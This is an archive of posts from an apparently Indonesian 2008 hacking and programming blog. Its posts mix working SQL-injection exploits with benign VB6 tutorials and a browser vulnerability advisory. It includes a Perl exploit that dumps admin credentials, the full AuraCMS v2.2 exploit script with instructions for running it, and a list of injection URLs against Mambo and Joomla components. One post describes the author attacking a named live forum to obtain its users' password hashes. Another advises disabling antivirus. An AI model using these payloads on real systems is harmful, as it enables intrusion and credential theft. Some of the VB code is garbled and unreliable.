        username,0x3a3a,password,0x3a3a3a)/**/from/**/platinum_admin/*";
my $exploit= $url2.$sploit;
my $ua = LWP::UserAgent->new();
my $cookie = HTTP::Cookies->new();
my $res = "";
my $content="";
my $cookie2 = HTTP::Cookies->new();
my $regex = "";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
#[-------------------------]
#   Apakah file eksis?
#[-------------------------]
$res = $ua->get($url1);
if(!$res->is_success)
{
print("[+] Gagal! file tidak ditemukan!\n");
print $res->status_line();
}

#[-------------------------]
#         Login User
#[-------------------------]
$res = $ua->get($url1);
$cookie->extract_cookies($res);
$ua->cookie_jar($cookie);
$res = $ua->post( $url1,
[ 'UN' => $user,
'PW' => $pass,
'keep_me_logged_in' => $loggedin,
'login' => $submit,
'r' => ""
]
);
#[-------------------------]
#         Eksploitasi
#[-------------------------]
$cookie->extract_cookies($res);
$ua->cookie_jar($cookie);
$res = $ua->get($exploit);
$content = $res->content;
if ($content =~ /:::(.+):::/)
{
$regex=$1;
($id,$usr,$md5)= split('::',$regex);
printf " [x]your id = $id \n [x]your username = $usr\n [x]your md5 pass = $md5 ";
}
else{ die "Gagal mengeksploitasi\n";
}

}


Originaly posted by n0c0py at http://tools.n0c0py.uni.cc/adv/irater.txt

Good Job Bud... ^_^

Fungsi Terbilang with VB.60

2008-06-08T23:21:00.003+07:00

Wew...
Iseng-iseng tadi ada temen minta bantuan buat bikin tugas kuliah.. Tugas nya yaitu membuat fungsi terbilang dengan menggunakan VB.6.0 dan harus support sampai bilangan trilyun... Setelah utak-utik sana sini akhirnya selesai juga...

Berikut Source Code nya...

Private Function Konversi(ByVal nNilai As Currency) As String
Dim Grade As Variant
Dim strTerbilang As String
Dim strPart As String
Dim iGrade As Byte

Grade = Array("Triliun ", "Milyar ", "Juta ", "Ribu ", "")

strTerbilang = ""

If Len(CStr(nNilai)) > 15 Then

strTerbilang = ""

Else

If Trim(nNilai) = "0" Then Konversi = "Nol ": Exit Function

strPart = Format(nNilai, String(15, "0"))

For iGrade = 1 To 5

If Val(Mid(strPart, (iGrade - 1) * 3 + 1, 3)) > 0 Then

strTerbilang = strTerbilang & _
GetRatus(Mid(strPart, (iGrade - 1) * 3 + 1, 3), iGrade)
strTerbilang = strTerbilang & Grade(iGrade - 1)

End If

Next iGrade

End If

Konversi = strTerbilang

End Function

Private Function GetRatus(ByVal strPart As String, ByVal iGrade As Byte) As String

Dim Angka1 As Variant, Angka2 As Variant
Dim i As Integer
Dim strHasil As String
Dim nTemp As Byte

Angka1 = Array("Satu ", "Dua ", "Tiga ", "Empat ", _
"Lima ", "Enam ", "Tujuh ", "Delapan ", "Sembilan ")
Angka2 = Array("Ratus ", "Puluh ", "")

For i = 1 To 3

nTemp = Val(Mid(strPart, i, 1))

If nTemp = 1 Then

If i = 1 Then

strHasil = "Seratus "

ElseIf i = 2 Then

i = i + 1

nTemp = Val(Mid(strPart, i, 1))

If nTemp = 0 Then

strHasil = strHasil & "Sepuluh "

ElseIf nTemp = 1 Then

strHasil = strHasil & "Sebelas "

Else

strHasil = strHasil & Angka1(nTemp - 1) & "Belas "
End If

ElseIf Val(strPart) = 1 And iGrade = 4 Then

strHasil = strHasil & "Se"

Else

strHasil = strHasil & "Satu "

End If

ElseIf nTemp <> 0 Then

strHasil = strHasil + Angka1(nTemp - 1) + Angka2(i - 1)

End If

Next i

GetRatus = strHasil

End Function

Private Sub cmdBilang_Click()
txt_2.Text = Konversi(txt_1.Text)
End Sub

Semoga bisa membantu.....

The DorkTools v.1.0.0

2008-06-05T20:22:00.006+07:00

Wew... Mohon maaf kepada teman-teman pengunjung blog karena saya jarang mengurus isi dari blog ini. Akhir-akhir ini saya banyak disibukan oleh beberapa deadline yang harus dengan segera saya selesaikan. Untuk itu saya akan coba menyempatkan diri untuk mengisi artikel di blog ini. Pada artikel kali ini saya akan mencoba membahas tentang programming. Yah bahasa yang dipergunakan masih seperti yang dulu, yaitu Visual Basic 6.0

Pada artikel ini kita akan membuat sebuah program sederhana yang berguna untuk mempermudah kita menggunakan Google Dork. Oke langsung saja...

Siapkan sebuah project baru

Siapkan Dua buah CommandButton, sebuah ListView, sebuah CommonDialog dan sebuah TextBox dan letakan pada form.

Kemudian atur properti setiap komponen diatas seperti berikut :

Form1

Caption = Simple Dork Tools
Name = frmMain
Startup Position = Center Screen
Border Style = Fixed Singel
MinButton = True

CommandButton1

Name = btnStart
Caption = Search

CommandButton2

Name = btnLoad
Caption = Load Dork

ListView

Name = LvDork
GridLines = True
View = lvwReport
Serta tambahkan sebuah header

CommonDialog

Name = CD

TextBox

Name = txtHost

Label1

Caption = Host

Lalu atur posisinya seperti dibawah ini

Kemudian kopi pastekan kode dibawah ini

Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
(ByVal hWnd As Long, ByVal IpOperation As String, ByVal IpFile As String, _
ByVal IpParameters As String, ByVal IpDirectory As String, ByVal nShowCmd As Long) As Long

Private Const SW_SHOW = 5

Private Sub btnLoad_Click()
Dim DorkPath As String
Dim linestr As String, dork As String, tmp() As String

CD.CancelError = True 'error bila user mengklik cancel pada CommonDialog
CD.DialogTitle = "Select Dork File" 'Caption commondialog
On Error Resume Next
CD.ShowOpen
DorkPath = CD.FileName
LoadFile LvDork, DorkPath

End Sub

Private Sub btnStart_Click()
On Error Resume Next
If txtHost.Text = "" Then
ShellExecute hWnd, "open", "http://www.google.com/search?q=" & LvDork.SelectedItem, vbNullString, vbNullString, SW_SHOWDEFAULT
Else
ShellExecute hWnd, "open", "http://www.google.com/search?q=" & LvDork.SelectedItem & " " & "site:" & txtHost.Text, vbNullString, vbNullString, SW_SHOWDEFAULT
End If
End Sub

Private Sub Form_Load()
load LvDork, App.Path & "\Dorklist.txt"
End Sub

Private Sub load(list As ListView, namafile As String)
Dim linestr As String, dork As String
On Error GoTo Err
Open namafile For Input As #1
While Not EOF(1)
Line Input #1, linestr
dork = linestr
DoEvents
list.ListItems.Add = dork
Wend
Close #1

Err:

End Sub

Private Sub LoadFile(list As ListView, sFile As String)
Dim linestr As String, dork As String, tmp() As String
'On Error GoTo err
Open sFile For Input As #1
While Not EOF(1)
Line Input #1, linestr
dork = linestr
DoEvents
list.ListItems.Add = dork
Wend
Close #1

'err:

'MsgBox "File Not Found", vbInformation + vbOKOnly, App.Title

End Sub

Sebelum menjalankan program terebut kita harus siapkan sebuah file yang berisi kumpulan dork yang akan kita load ke dalam program ini. Secara default program ini akan membaca file DorkList.txt yang diletakan dalam folder yang sama dengan program ini disimpan. Namun kita juga dapat menggunakan file lain dengan cara menekan tombol Load Dork. Anda bisa mendownload program tersebut pada http://geocities.com/yadoy666/download/DorkTools.zip

Compile Exploit dengan ActivePerl

2008-04-25T02:58:00.006+07:00

Wah, mayan lama juga nih saya ga' nge-blog... Maklum masih ada beberapa urusan yang harus diselesaikan.. Ok langsung aja. Pada kesempatan kali ini kita akan membahas cara meng-compile exploit yang kita dapatkan dengan menggunakan ActivePerl.

Terkadang bila kita browsing ke milw0rm kita menemukan suatu exploit yang menggunakan perl. Namun kita binggung bagaimana cara menggunakan exploit tersebut di mesin Windows. Untuk mengatasi kebinggungan anda, saya akan mencoba berbagi informasi bagaimana cara menggunakan exploit tersebut. Untuk menggunakan exploit tersebut kita membutuhkan sebuah software yang bernama ActivePerl, silahkan cari di google untuk mendapatkannya. Sepertinya pada CD-Yogyafree ada software tersebut.

Oke setelah kita install ActivePerl nya lalu langkah selanjutnya adalah mencari exploit yang akan kita gunakan. Sebagai contoh kita menggunakan exploit ini :

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use Getopt::Long;

#
# [!] Discovered.: DNX
# [!] Vendor.....: http://www.auracms.org
# [!] Detected...: 19.01.2008
# [!] Reported...: 25.01.2008
# [!] Response...: 30.01.2008
#
# [!] Background.: AuraCMS is a CMS based on PHP and SQL
#
# [!] Bug........: $_GET['albums'] in mod/gallery/ajax/gallery_data.php near line 173
#
# 173: case 'detail':
# 174: if (isset($_GET['id'])){
# 175: $id = $_GET['id'];
# 176: $albums = $_GET['albums'];
#
# 200: $query = mysql_query ("SELECT * FROM `mod_gallery` WHERE `kid` = '$albums' $SQL_SORT LIMIT $image,$limitimage");
#
# [!] Solution...: Install gallery update!
#

if(!$ARGV[1])
{
print "\n \\#'#/ ";
print "\n (-.-) ";
print "\n ---------------------oOO---(_)---OOo--------------------";
print "\n | AuraCMS v2.2 (gallery_data.php) Remote SQL Injection |";
print "\n | (works only with magic quotes = off) |";
print "\n | coded by DNX |";
print "\n --------------------------------------------------------";
print "\n[!] Usage......: perl aura.pl [Host] [Path] ";
print "\n[!] Example....: perl aura.pl 127.0.0.1 /auracms/";
print "\n[!] Options....:";
print "\n -p [ip:port] Proxy support";
print "\n";
exit;
}

my $host = $ARGV[0];
my $path = $ARGV[1];
my %options = ();
GetOptions(\%options, "p=s");

print "[!] Exploiting...\n";

exploit();

print "\n[!] Exploit done\n";

sub exploit
{
my $url1 = "http://".$host.$path."index.php?pilih=gallery&mod=yes";
my $url2 = "http://".$host.$path."mod/gallery/ajax/gallery_data.php";
my $ua = LWP::UserAgent->new;
my $cookie = HTTP::Cookies->new();
my $regexp = ":\"(.*?)\",\"name\"(.*)([a-fA-F0-9]{32})";
my $res = "";

if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}

###############
# exist file? #
###############
$res = $ua->get($url2);
if(!$res->is_success)
{
die("[!] Failed, file not found\n");
}

##########################
# get cookie from server #
##########################
$res = $ua->get($url1);
$cookie->extract_cookies($res);
$ua->cookie_jar($cookie);
$ua->get($url2);
$res = $ua->get($url2);

######################
# check magic quotes #
######################
$url2 .= "?action=detail&id=&image=&albums='";
$res = $ua->get($url2);
$content = $res->content;

if($content =~ /,\"albums\":\[\"\\\\'\"],/)
{
die("[!] Failed, magic quotes on\n")
}

##############
# get hashes #
##############
$url2 .= "%20union%20select%20user,2,3,4,5,6,7,password,9,10%20from%20useraura/*";
$res = $ua->get($url2);
$content = $res->content;

my @cont = split(/{\"files\"/, $content);
foreach (@cont)
{
if($_ =~ /$regexp/)
{
print "$1 $3\n";
}
}
}

# milw0rm.com [2008-02-12]

Exploit tersebut merupakan sebuah exploit yang dapat digunakan untuk menyerang website yang menggunakan AuraCMS v2.2 yang memanfaatkan kelemahan pada file gallery_data.php sehingga memungkinkan attacker melakukan serangan Remote SQL Injection.

Lalu untuk menggunakan exploit tersebut, setelah kita install ActivePerl langkah selanjutnya adalah kopi paste exploit diatas ke dalam notepad dan simpan dengan ekstensi aura_gallerydata.pl. Lalu untuk menjalankannya cukup buka Command Prompt lalu masuk ke direktori tempat file tersebut disimpan, kemudian ketikan perl aura_gallerydata.pl maka exploit tersebut dapat berjalan dengan baik. Berikut saya berikat screenshoot penggunaan exploit tersebut.

Demikianlah trik sederhana dari saya, semoga trik ini dapat bermanfaat bagi teman-teman semua..

Best Regrads

YaDoY666

Implementasi Vernam Cipher dengan Visual Basic 6.0

2008-03-29T19:51:00.005+07:00

Kriptografi bagi kebanyakan orang adalah sesuatu yang sangat sulit dan kita sebagai pemula cenderung malas untuk mempelajarinya. Namun ada sebuah metode kriptografi yang agak mudah untuk dipelajari dan para ahlipun telah menyatakan bahwa metode ini merupakan metode kriptografi yang cukup aman untuk digunakan. Metode tersebut biasa dikenal dengan nama One Time Pad (OTP) atau yang lebih dikenal dengan sebutan Vernam Cipher. Vernam Cipher diciptakan oleh Mayor J. Maugborne dan G. Vernam pada tahun 1917.

Algoritma One Time Pad (OTP) merupakan algoritma berjenis symetric key yang artinya bahwa kunci yang digunakan untuk melakukan enkripsi dan dekripsi merupakan kunci yang sama. Dalam proses enkripsi, algoritma ini menggunakan cara stream cipher yang berasal dari hasi XOR antara bit plaintext dan bit key.

contoh:
Saya memiliki sebuah plaintext yaitu RUSDI dan memiliki sebuah kunci yaitu
CRASH (ingat panjang kunci harus sama dengan plaintext dan sebaiknya tidak
ada karakter yang diulang).

Pertama kita harus mendapatkan kode ASCII dari plaintext kemudian diubah
ke bentuk biner

-----------------------------------
| Karakter | ASCII | Notasi biner |
-----------------------------------
| R | 82 | 0101 0010 |
| U | 85 | 0101 0101 |
| S | 83 | 0101 0011 |
| D | 68 | 0100 0100 |
| I | 73 | 0100 1001 |
-----------------------------------

Hal yang sama juga harus dilakukan pada kunci yang dipilih.

-----------------------------------
| Karakter | ASCII | Notasi biner |
-----------------------------------
| C | 67 | 0100 0011 |
| R | 82 | 0101 0010 |
| A | 65 | 0100 0001 |
| S | 83 | 0101 0011 |
| H | 72 | 0100 1000 |
-----------------------------------

Setelah itu masing-masing karakter di XOR-kan dengan Key

R = 0101 0010 U = 0101 0101 S = 0101 0011 D = 0100 0100 I = 0100 1001
C = 0100 0011 R = 0101 0010 A = 0100 0001 S = 0101 0011 H = 0100 1000
XOR -------------------------------------------------------------------------
Cipher: 0001 0001 0000 0111 0001 0010 0001 0111 0000 0001
-----------------------------------------------------------------------------
ASCII : Ctrl-Q Ctrl-G Ctrl-R Ctrl-W Ctrl-A

Proses dekripsi pesan juga melakukan operasi yang sama yaitu XOR antara Cipher
dengan key.

Cipher: 0001 0001 0000 0111 0001 0010 0001 0111 0000 0001
Key: 0100 0011 0101 0010 0100 0001 0101 0011 0100 1000
XOR -------------------------------------------------------------------------
Plain : 0101 0010 0101 0101 0101 0011 0100 0100 0100 1001
-----------------------------------------------------------------------------
ASCII : R U S D I

Saya telah membuat sebuah program sederhana dengan menggunakan Visual Basic 6.0 sebagai implementasi dari Vernam Cipher yang tersebut diatas.

Program ini membutuhkan 3 buah text box 3 buah label dan 2 buah command button. Cara penggunaan program ini cukup sederhana, kita tinggal memasukan string yang akan kita enkrip/dekrip kemudian masukan juga kunci nya. Ingat untuk melakukan enkrip dan dekrip kunci yang dipergunakan harus sama.

Setelah kita menyiapkan textbox, label dan Command Button lalu kopi paste kan source code dibawah ini kedalam form.

Option Explicit
Private RByte() As Variant

Private Sub cmdDecrypt_Click()
TxtPlain.Text = crypt(TxtCipher.Text, False)
End Sub

Private Sub cmdEncrypt_Click()
TxtCipher.Text = crypt(TxtPlain.Text, True)
End Sub

Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
FrmAbout.Show
End Sub

Private Function crypt(strInput As String, _
ByVal bEncrypt As Boolean) As String

Dim I As Long
Dim NewAsc As Long
Dim keypos As Long

GetKey TxtKey
For I = 1 To Len(strInput)
If bEncrypt Then
NewAsc = Asc(Mid$(strInput, I, 1)) + RByte(keypos)
Else
NewAsc = Asc(Mid$(strInput, I, 1)) - RByte(keypos)
End If
Do While NewAsc < newasc =" NewAsc"> 255
NewAsc = NewAsc - 255
Loop
Mid$(strInput, I, 1) = Chr$(NewAsc)
keypos = keypos + 1
If keypos > UBound(RByte) Then
keypos = 0
End If
Next I
crypt = strInput

End Function

Private Sub GetKey(StrA As String)

Dim I As Long
If Len(StrA) Then
ReDim RByte(Len(StrA) - 1) As Variant
For I = 1 To Len(StrA)
RByte(I - 1) = Asc(Mid$(StrA, I, 1))
Next I
End If
End Sub

Kemudian coba jalankan..
String yang berupa plaintext akan diubah menjadi cipher text dan sebaliknya. Namun apabila key yang dimasukan berbeda maka akan menghasilkan hasil yang berbeda pula. Demikianlah tulisan saya ini. Semoga bermanfaat.

Referensi :
http://ezine.echo.or.id/ezine14/04_Algoritma_Enkripsi_One_Time_Pad.txt

NB
---
Source code lengkap, dapat di download pada

http://geocities.com/yadoy666/download/vernamcipher.zip

Goolag Scanner

2008-03-07T12:07:00.005+07:00

Sebuah grup hacker yang menamakan diri 'Cult of the Dead Cow', merilis sebuah tool gratis bernama Goolag. Goolag diklaim memudahkan para hacker melancarkan aksinya dengan memanfaatkan situs mesin cari populer, Google.

Goolag merupakan sebuah hacker tools yang berguna untuk mencari kelemahan suatu website dengan memanfaatkan Google. Seperti kita ketahui sebelumnya bahwa mesin pencari Google sering dimanfaatkan para attacker untuk melancarkan aksinya seperti mencari kelemahan suatu website, mendapatkan username dan password, mencari direktori sensitif, mencari data-data penting suatu perusahaan sampai dengan pencurian kartu kredit pun dapat dilakukan hanya dengan memanfaatkan Google.

Sebenarnya scanner seperti Goolag ini telah banyak bermunculan sebelum Goolag muncul. Bahkan ada beberapa tools scanner yang memanfaatkan google ini merupakan buatan anak indonesia. Namun Goolag diprediksi akan lebih populer bila dibandingkan dengan scanner lain yang memanfaatkan google dikarenakan penciptanya merupakan sebuah group hacker legendaris yang cukup terkenal pada akhir tahun 90-an. Group ini juga pernah membuat sebuah hacker tools yang cukup populer yaitu BACK ORIFICE yang bisa dipergunakan untuk menembus komputer dengan sistem operasi Microsoft Windows.

Goolag merupakan sebuah software open source yang dapat dengan bebas di kembangkan dan didistribusikan. User interfce Goolag sangat sederhana, dan dapat dengan mudah di gunakan bahkan oleh seorang pemula dalam dunia sekuriti. Untuk dapat berjalan dengan baik Goolag membutuhkan .NET V.2.0. Goolag dapat di download di

http://rapidshare.com/files/95659209/Goolag_Scanner_1.0.0.40_Setup.exe

Berikut saya berikan tampilan user interface dari Goolag

Sangat sederhana sekali bukan... ^_^

Dari beberapa scanner yang memanfaatkan google yang pernah saya gunakan, menurut saya Goolag adah yang terbaik... Pada versi diatas Goolag menyediakan 1418 Google Dork yang dapat digunakan para attacker melancarkan aksinya. Dork tersebut masih bisa kita tambah dan kurangi sendiri dengan menggunakan sebuah file yang berisi berbagai dork lain yang disimpan dalam sebuah file dengan format *.XML

Demikianlah informasi tentang Goolag yang dapat saya berikan, semoga bermanfaat bagi teman-teman.

*nb
Goolag di deteksi oleh antivirus sebagai Hacker.Tools Untuk dapat menggunakannya matikan antivirus anda.

Mencegah SQL Injection

2008-02-24T13:04:00.003+07:00

Originaly postedBy external_system_error
Published: February 21, 2008 on http://www.sekuritionline.net

Modified by YaDoY666

SQL Injection adalah salah satu jenis penyerangan yang mengijinkan user tidak sah(penyerang)untuk mengakses database server. Pada dasarnya,serangan ini difasilitasi oleh kode program anda sendiri.
teknik nya,penyerang mencoba memasukkan query (melalui field atau URL) yang akan menyebabkan database server men-generate query SQL yang tidak valid.
Pada kenyataan nya,SQL injection terbukti merupakan salah satu teknik terbaik yang sering
melumpuhkan sasarannya. Begitu penyerang berhasil menguasai kendali dataase server,ia bisa
melakukan apa saja,seperti memodifikasi atau bahkan menghapus semua data yang ada. bagaimana pun juga ,
ini bisa dicegah jika kode program anda melakukan validasi yang baik.
Sebenarnya apa bila anda teliti,teknik SQL injection sangat sederhana sekali. Akan tetapi
justru yang sering diabaikan oleh para programer,entah itu tidak tahu atau lupa.

Berikut ini beberapa contoh teknik SQL injection,implementasi,dan cara menggagalkan nya.

Single SQL Injection
walaupun penyerang awalnya mencoba memasukan query berupa pernyataan SQL,akan tetapi bukan
sembarang query. Dalam hal ini,penyerang cukup memiliki pengatahuan mengenai SQL,sebagai
contoh permulaan (maklumlah saya masih newbie :P) anda memiliki kode seperti ini.

$match = false;
if (isset($_POST['submit'])) {
$nama = $_POST['nama'];
$pass = $_POST['pass'];
$sql = "SELECT nama, password FROM user WHERE
nama='$nama' AND password='$pass'";
$res = mysqli_query($db, $sql);
// jika res berhasil,dan row yang
// dikembalikan=1, set $match=true
if ($res && mysqli_query_rows($res) == 1) {
$match = true ;
mysqli_free_result($res);
}
if ($match === true) {
echo 'account match';
} else {
echo 'invalid account';
}
}

kode program diatas memang kelihatan melakukan verifikasi data, tetapi sebenarnya sangat
rapuh,penyerang bisa menggnakan query-query seperti dibawah ini,untuk melakukan akses
secara tidak sah

// mengisi field nama saja,# adalah komentar,
// yang akan mengabaikan baris setelahnya
admin'#

// mengisi nama field saja
// mengekstrak data kelokasi tertentu
'OR' 1=1 INTO DUMPFILE '/path/ke_lokasi/file.txt '#
'OR' 1=1 INTO OUTFILE '/path/ke_lokasi/file.txt '#

Bagaimapun juga,contoh contoh SQL injection diatas adalah contoh yang umum. Adapun untuk
mencegah nya menggunakan fungsi mysql_real_escape_string () atau addslashes(), seperti
yang diuraikan pada fungsi myMacig()sebelumnya

$nama = myMacig($_POST['nama']};
$pass = myMacig($_POST['pass']};

Multiple SQL injection
Contoh SQL injection lainnya adalah dengan memberikan multiple query,seperti berikut:
// $id dari method GET/POST
$sql = "SELECT * FROM buku WHERE kode='{$id}’ “;
//mengahapus isi table
0; DELETE FROM user
// membuat account baru
0; GRANT ALL ON *.* TO 'xxx@%'
Dalam kasus ini,macig quote akan mengabaikan tanda titik koma,ini sangat membahayakan
jika menggunakan SQLite atau postgreSQL. Adapun solusi nya adalah menggunakan operator
casting untuk memastikan bahwa id harus integer.

//Simulasi nilai $_POST['id']
0; DELETE FROM user
$id = (int) myMacig($_POST['id']);

apabila anda ingin memeriksa apakah input mengandung karakter tertentu,gunakan fungsi strpos().

$nama = myMacig ($_POST ['id']);
// periksa apakah karakter ; terdapat
// di variabel $nama.
if (strpos($nama, ';' die ('Naughty Naughty,
Very Naughty...');

Berikut penulis berikan contoh nyata penggunaan SQL Injection pada beberapa CMS terkemuka (Mambo & Joomla).

Mambo
=====
index.php?option=com_garyscookbook&Itemid=-1&func=detail&id=
-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,
username+from%2F%2A%2A%2Fmos_users/*

index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat
(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*

index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat
(username,0x3a,PASSWORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+from+
mos_content_comments+where+1=1

Joomla
======
index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section&section=
-000/**/union+select/**/000,111,222,concat(username,0x3a,password),
0,concat(username,0x3a,password)/**/from/**/jos_users/*

index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=-1&cat_id=
-9999999/**/union/**/select/**/000,111,222,username,password,
0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2/**/from/**/jos_users/*

index.php?option=com_clasifier&Itemid=-1&cat_id=
-9999999/**/union/**/select/**/concat(username,0x3a,password)
/**/from/**/jos_users/*

Thank you to the GOD who had not given me the bad characteristics, the friend of my close friend and notebook Aspire 5315-200508Mi that always accompanied me in studying
By ExTeRNaL_SySTeM_ErRoR.@ka.adhie

YaDoY Thabx's For ExTeRNaL_SySTeM_ErRoR.@ka.adhie, DubeLFan, m4rtincornelis, X-Sari, Jerry Maheswara,n0c0py, Ray16, echo, sekuriti online, Yogyafree Member specially Yogyafree Jakarta

FireFox 2.0.0.11 and Opera 9.50 beta Remote Memory Information Leak

2008-02-20T01:19:00.009+07:00

* Name    : FireFox 2.0.0.11 and Opera 9.50 beta Remote Memory Information Leak
*         : FireFox 2.0.0.11 Remote Denial of Service
* Type    : Remote Information Disclosure
* Impact  : Medium / High
* Credits : gynvael.coldwind//vx / Hispasec / Team Vexillium
* Special thanks to udevd and porneL


Video demonstration of the vulnerability:  download (5.7mb, AVI, DivX 6.6.1).




* Brief

Opera and FireFox contains vulnerable code for handling BMP files with partial
palette. The code allows to craft a BMP file that leaks information from
the heap. This information can be sent to remote server using canvas
tag (HTML 5) and javascript.

Also other browser (for example Apple Safari) contain vulnerable BMP handling code,
but since there is no way of acquiring the image data (due to not all
canvas method being implemented), it doesn't pose a serious threat
(hmm... then again, maybe the attacker could convince the user to do a screenshot
and send it to the attacker :) As a matter of fact Apple Safari has a simillar
problem with certain GIF files.


* Verbose

The BMP format has a field in the BITMAPINFOHEADER named biClrUsed, the field
says how many colors does the palette contain. If this field is 0,
then 256 color palette is used. When this field is not 0, the palette has the
given number of colors.

Both browsers either allocate to just the "right" amount of memory (using
the equation biClrUsed * sizeof(RGB)), or forget to zero the allocated palette.
In this case, if a color from the upper (non existing or not zeroed) part of the
palette is used, soem information is copied to the screen as a colorful pixel.

If the attacker creates a BMP file with biClrUser = 0, and fills it with gradient,
from 0 to 255: 00 01 02 03 04 05 ... and so on, the displayed BMP will in
fact copy the palette to the screen, which of course means that it copies the
data lying on the heap to the screen. The attacker could also use HTML 5 tag canvas
to aquire pixel color information from the bitmap, and then use javascript to post
it to a remote server. The harvested data contains various information including
parts of other websites, users "favorites" and history, and other information. This
has been tested, a proof of concept exploit has been created, but will not yet be released.


* Versions affected and vendor status

FireFox 2.0.0.11 and prior that support canvas.getImageData or any other method
to aquire image data are affected. The vendor was informed and has released a non
vulnerable version of the application - 2.0.0.12. Opera 9.24 is not affected
due to not supporting canvas.getImageData. The newer beta versions are affected
(9.50 beta). The vendor was informed and has released a non vulnerable version of
the application - 9.25. Other vendors were also informed.


* Additional info

FireFox 2.0.0.11 may crash when using this vulnerability due to heap
boundary error (read access violation). So it is possible toremotly crash
the browser.

* Video demonstration

A video demonstration of the vulnerability can be found on the following sites:

http://blog.hispasec.com/lab/
http://vexillium.org/?sec-ff


* Disclaimer

This document and all the information it contains is provided "as is", without
any warranty. The author is not responsible for the misuse of the information
provided in this advisory. The advisory is provided for educational purposes only.
Permission is hereby granted to redistribute this advisory, providing that
no changes are made and that the copyright notices and disclaimers remain intact.

Bugs pada Forum Komunitas Open SUSE Indonesia

2008-02-02T10:14:00.001+07:00

Beberapa waktu yang lalu saya chating dengan seorang hacker turki, kemudian dia bertanya kepada saya, apakah kamu sudah melihat berita baru di forum h4ck-y0u? Kemudian saya bertanya kembali kepada dia, memangnya ada berita apa? dia menjawab bahwa ada sebuh berita besar, Forum Komunitas Open SUSE Indonesia di hack. Wew.. saya sangat terkejut mendengar berita tersebut mengingat Forum Komunitas Open SUSE Indonesia memiliki member yang banyak dan banyak nama besar yang tergabung dalam komunitas tersebut. Karena rasa penasaran yang tinggi, penulis dengan segera membuka forum h4ck-y0u dan benar saja pada topik Club show off ada tread Suse Linux (Indonesia) hacked | 740 users. Sebanyak 740 user yang terdaftar dalam forum tersebut ID dan Passwordnya terancam. Walaupun user name dan passwordnya masih dalam bentuk MD5 hash.

Setelah penulis selidiki, ternyata Forum Komunitas Open SUSE Indonesia menggunakan WordPress forum plugin Version: 1.7.4. di mana pada Plugin tersebut memiliki kelemahan, Jenis kelemahan yang terdapat pada plugin ini adalah Remote SQL Injection sehingga sang attacker dapat memasukan SQL Exploit untuk mendapatkan user name dan password pada forum tersebut, termasuk username dan password sang administrator.

Exploit yang digunakan adalah

1+union+select+null,concat
(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,
null+from+wp_users where id=1/*

Kemudian penulis coba menggunakan Exploit tersebut pada forum Komunitas Open SUSE Indonesia, dan benar saja MD5 hash untuk user name dan password pada forum tersebut dapat penulis dapat kan. Berikut penulis berikan hasil implementasi dari exploit tersebut pada forum Komunitas Open SUSE Indonesia

http://opensuse.or.id/forum/?forumaction=
showprofile&user=5+and+1=
2+union+all+select+1,concat(user_login,0x3a,user_pass,0x3a,
user_email),3,4,5,6,7+from+wp_users/*

MD5 hash yang penulis dapatkan dapat di crack dengan menggunakan berbagai password cracker yang tersedia sepert Cain & Able dan lain-lain

Semoga kejadian ini dapat memberi pelajaran kepada kita semua bahwa tidak ada sesuatu yang aman 100%, so bagi teman-teman yang menjadi administrator pada suatu situs atau forum rajin-rajin lah melakukan patch agar situs atau forum menjadi lebih baik lagi...

Best Regrads

YaDoY666

Membuat program terminator sederhana dengan menggunakan VB.6

2008-01-28T11:37:00.001+07:00

Author By : YaDoY666
You can redistribute this source code but dont ever change the author

Pada kesempatan kali ini saya ingin berbagi ke pada para pembaca blog ini tentang cara untuk membuat sebuah program yang berguna untuk men-terminate proses yang sedang berjalan di memory. program ini akan saya namakan "The Stupid Treminator". Program ini baik digunakan sebagai alternatif apabila taskmanager kita terkunci oleh virus. Oke langsung aja. Dalam pembuatan program ini kita membutuhkan dua buah form, tiga buah class module . Form pertama sebagai form utama dan form kedua sebagai halaman about. Beri nama FrmMain untuk form pertama, dan Frm_Splash untuk form kedua. Kemudian berinama cCRC32 untuk class module pertama, cGetFileIcon untuk class module kedua, dan cScanProcesses. Buat design form utama seperti gambar dibawah ini

Kemudian bentuk form ke dua seperti pada gambar dibawah ini

Kemudaian kopi paste kan source code dibawah ini dan letakan pada FrmMain

Dim WithEvents SCANPROC As cScanProcesses

Dim m_Time As Single
Dim FILEICON As cGetFileIcon

Option Explicit

Const SR = 0
Const GDI = 1
Const USR = 2
Const VER_PLATFORM_WIN32s = 0
Const VER_PLATFORM_WIN32_WINDOWS = 1
Const VER_PLATFORM_WIN32_NT = 2

Private Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type

Private Type MEMORYSTATUS
dwLength As Long
dwMemoryLoad As Long
dwTotalPhys As Long
dwAvailPhys As Long
dwTotalPageFile As Long
dwAvailPageFile As Long
dwTotalVirtual As Long
dwAvailVirtual As Long
End Type

Private Declare Function GetComputerName Lib "kernel32.dll"
Alias "GetComputerNameA" (ByVal lpBuffer As String, nSize As Long) As Long

Private Declare Function ShellExecute Lib "shell32.dll"
Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String,
ByVal lpFile As String, ByVal lpParameters As String,
ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long

Private Declare Sub GlobalMemoryStatus Lib "kernel32" (lpBuffer As MEMORYSTATUS)

Private Declare Function pBGetFreeSystemResources Lib "rsrc32.dll" _
Alias "_MyGetFreeSystemResources32@4" (ByVal iResType As Integer) As Integer

Private Declare Function GetVersionEx Lib "kernel32" _
Alias "GetVersionExA" (lpVersionInformation As OSVERSIONINFO) As Long

Private Sub Cmd_Refresh_Click()
ListView1.ListItems.Clear

SCANPROC.SystemProcesses = True
m_Time = Timer
